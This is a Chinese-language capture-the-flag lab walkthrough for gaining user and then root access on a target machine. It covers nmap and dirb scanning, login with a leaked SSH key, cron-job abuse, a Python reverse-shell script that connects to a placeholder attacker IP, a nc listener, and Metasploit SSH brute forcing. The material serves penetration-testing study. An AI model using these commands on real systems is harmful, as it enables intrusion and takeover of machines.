搭建环境

真机安装

python环境（python-IDE）

java环境（java-IDE）

PHP环境（phpstudy）

火狐浏览器延长支持板（需要安装HackBar扩展插件）

notepad++

虚拟机安装

kali linux

Win10（CFT工具包，为防止有后门不安装在真机）

拿到第一个用户权限并获取root权限

1.信息探测探测靶场开放的服务与服务的版本nmap -sV ip探测靶场全部信息nmap -A -v ip探测靶场的操作系统与版本nmap -O ip同样也可以用nikto来挖掘信息nikto -host ip2.分析探测结果首先考虑暴力破解和私钥泄露对于开放http服务的80端口或者其他端口的靶场首先考虑通过浏览器访问对应靶场的http服务（http://ip:port），然后再使用探测工具对http的目录进行探测(dirb http://ip:port)3.利用挖掘到的ssh私钥修改id_rsa的权限chmod 600 id_rsa利用私钥登录服务器ssh -i id_rsa 用户名@ip

登录服务器后需要做一下三点操作1.查看当前用户2.id查看当前用户的权限3.查看根目录寻找flag文件注：flag文件只属于root用户和对应的组cat /etc/passwd##查看所有用户的列表cat /etc/group##查看用户组find / -user 用户名##查看属于某些用户的文件/tmp##查看缓冲文件目录ls -al##查看隐藏文件4.查看/etc/crontab 这个文件，看是否有定时任务存在cat /etc/crontab5.编写反弹攻击的shell代码#!/usr/bin/python导入os，subprocess,socket这三个模块import os,subprocess,socket创建一个套接字s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)套接字反弹到攻击机的ip和端口号s.connect(("攻击机IP地址","攻击机监听端口"))标准输入赋值给套接字的标识符os.dup2(s.fileno(),0)标准输出赋值给套接字的标识符os.dup2(s.fileno(),1)错误输出赋值给套接字的标识符os.dup2(s.fileno(),2)子进程调用shell交互p=subprocess.call(["/bin/sh","-i"])6.查看端口是否被占用查看在用端口sudo netstat -pantu监听端口nc -lvp 44457.将编写的反弹攻击的shell代码上传到靶机中，然后更名为与靶机中py文件一样的名字8.将上传的文件提升权限9.查看/home文件是否具有root权限10.利用cupp创建字典注：kali中并没有这样的集成字典，需要自己gitgit clone https://github.com/jeanphorn/common-password.gitchmod +x cupp.py./cupp.py -i11.使用metasploit破解sshmsfconsolemsf > use auxiliary /scanner /ssh//ssh_loginmsf auxiliary(ssh_login) > set rhosts 192.168.101.47msf auxiliary(ssh_login) > set username simonmsf auxiliary(ssh_login) > set pass_file simon.txtmsf auxiliary(ssh_login) > set threads 5msf auxiliary(ssh_login) > show optionsmsf auxiliary(ssh_login) > set verbose truemsf auxiliary(ssh_login) > run12.进行会话优化python -c "import pty;pty.spawn('/bin/bash')"su -root13.获取flag文件一般在root目录下